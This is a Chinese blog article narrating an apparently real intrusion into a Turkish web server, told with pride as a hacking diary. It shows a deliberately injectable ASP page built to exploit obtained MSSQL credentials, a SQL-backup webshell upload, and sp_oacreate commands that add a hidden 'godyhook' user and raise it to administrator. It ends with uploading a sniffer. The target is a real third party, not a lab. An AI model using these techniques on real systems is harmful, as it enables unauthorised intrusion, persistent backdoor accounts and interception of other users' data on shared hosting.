当前位置: 移动技术网 > 网络运营>安全>网站安全 > 入侵土耳其网站实例

入侵土耳其网站实例

2018年03月08日  | 移动技术网网络运营  | 我要评论
打开sql用查询分析器连上,发现了几个数据库估计是服务器的几个网站共用的这一个sql server 于是立刻本地构造一个注射点,准备列目录。 构造注射点代码如下:
<%
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;data source=212.175.236.xxxx;uid=axxxxx;pwd=xxxx;database=xxxx"
%>


我隐藏掉了真实的用户跟密码。。这里我说下怎么利用这个mssql的用户名和密码。首先我们构造一个有注射漏洞的文件sql.asp,代码如下:


<!--#include file="conn.asp"-->
<%
dim rs,strsql,id
set rs=server.createobject("adodb.recordset")
id = request("id")
strsql ="select * from pe_guestbook where guestid=" & id
rs.open strsql,conn,1,3
rs.close
%>



这里我们可以看到,直接用request("id") 取值没有过滤就构成了注入漏洞。我们在最前面加上,就是这个文件包含了conn.asp,把这两个文件放在同一目录下。这里我在本机架设放在web目录下,用啊d检测一下,地址为http://127.0.0.1/sql.asp?id=1。因为sql.asp明显有注射漏洞,再包含conn.asp,所以一检测1就有注射点了,如图1



ps:如果看过我以前文章的朋友肯定会觉的熟悉吧 ,因为这招我已经用过了,呵呵这里再写一次一个是为了自己复习下,一个也是为了给不会的朋友再说下。

既然是db权限我们最常用的就是列目录然后备份获得webshell了吧?嘿嘿。找了半天终于在d:\inetpub\sevi发现了网站的根目录,为了防止出错我还多试了几遍,确定是web目录后马上使用sql备份之..这里语句我就不写了,上次渗透黑客风云的文章里写了很大的篇幅,不懂的朋友可以自己去看下,因为偶们直接用语句备份,所以成功的备份个小马上去 如图2 3







传上大马之后发现服务器竟然不支持中文..看起来很不舒服。不过能浏览一些盘,看了下web目录服务器上共有7。8个网站 都可以浏览,随便看了个站发现了一个sql密码竟然跟我的是不一样的,于是重新用sql连上,发现这回竟然是sa权限 如图4



但是在用xp_cmdshell存储过程执行命令的时候发现管理员把xplog70.dll给删掉了,我日。

但是没关系 偶们还有sp_oacreate可以用 用sp_oacreate一样可以执行系统命令

在查询分析器里执行

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null, 'c:\windows\system32\cmd.exe /c net user godyhook hook /add'

就是利用sp_oacreate来添加一个godyhook的系统用户 然后直接提升为管理员权限就ok了

提示命令完成成功 说明sp_oacreate并没有被删除 如图5



但是连上终端的时候却提示我没有进入桌面的权限,着实郁闷了半天。后来好半天才想起来只是加了用户 但是并没有把

用户提升到管理员组,晕 真是大意

马上执行

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null, 'c:\windows\system32\cmd.exe /c net localgroup administratos godyhook /add'

然后再连一下 发现成功进入服务器鸟..看了下 网站有几个 哈哈 如图

然后上传一个cain到服务器上 准备开始偶们的sniffer 哈哈. 文章着实没什么技术含量 也就是普通的入侵日记。 本来还有几篇文章的因为杂志的原因暂时不能发出来 嘿嘿

总结:对于拿到mssql帐号找web目录,可以利用玫瑰渗透pcshare的方法,快速查找!








如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网